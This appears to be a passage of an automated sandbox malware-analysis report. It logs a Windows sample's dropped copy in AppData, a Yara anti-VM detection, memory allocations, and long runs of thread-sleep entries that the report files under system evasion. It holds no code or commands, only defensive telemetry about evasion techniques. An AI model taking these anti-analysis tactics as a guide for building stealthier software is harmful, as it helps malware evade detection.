Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: VQsnGWaNi5.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7384, type: MEMORYSTR

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: 2870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: 90D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: A0D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: A2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: B2F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: 2840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory allocated: 48D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: 1580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: 9320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: A320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: A530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: B530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: 1250000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239874	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239765	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239654	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239543	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239421	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239308	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239169	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 239046	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238937	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238827	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238718	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238609	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238452	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238343	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238230	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 238109	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 237997	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 237812	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 237694	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 237513	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598366	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 598243	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597350	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596452	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594117	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 593891	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239600	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239495	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239265	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239123	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 239002	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 238320	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237931	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237827	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237489	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237374	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 237265	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599233
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599124
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598905
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598796
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598576
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598245
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597921
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597374
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 597032
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596906
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596796
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596568
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596446
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596343
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596234
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596124
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595796
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595687
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595577
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595249
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595139
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Thread delayed: delay time: 594593

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Window / User API: threadDelayed 1436	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Window / User API: threadDelayed 1717	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8468	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 599	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7008	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Window / User API: threadDelayed 3174	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Window / User API: threadDelayed 6649	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Window / User API: threadDelayed 964	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Window / User API: threadDelayed 1992	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Window / User API: threadDelayed 8551
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Window / User API: threadDelayed 1310

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -239874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -239765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -239654s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -239543s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -239421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -239308s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -239169s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -239046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -238937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -238827s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -238718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -238609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -238452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -238343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -238230s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -238109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -237997s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -237812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -237694s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6596	Thread sleep time: -237513s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 6476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172	Thread sleep count: 8468 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3064	Thread sleep count: 599 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7324	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7724	Thread sleep count: 3174 > 30	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7724	Thread sleep count: 6649 > 30	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -598366s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -598243s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -597350s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe TID: 7700	Thread sleep time: -597125s >= -30000s	Jump to behavior
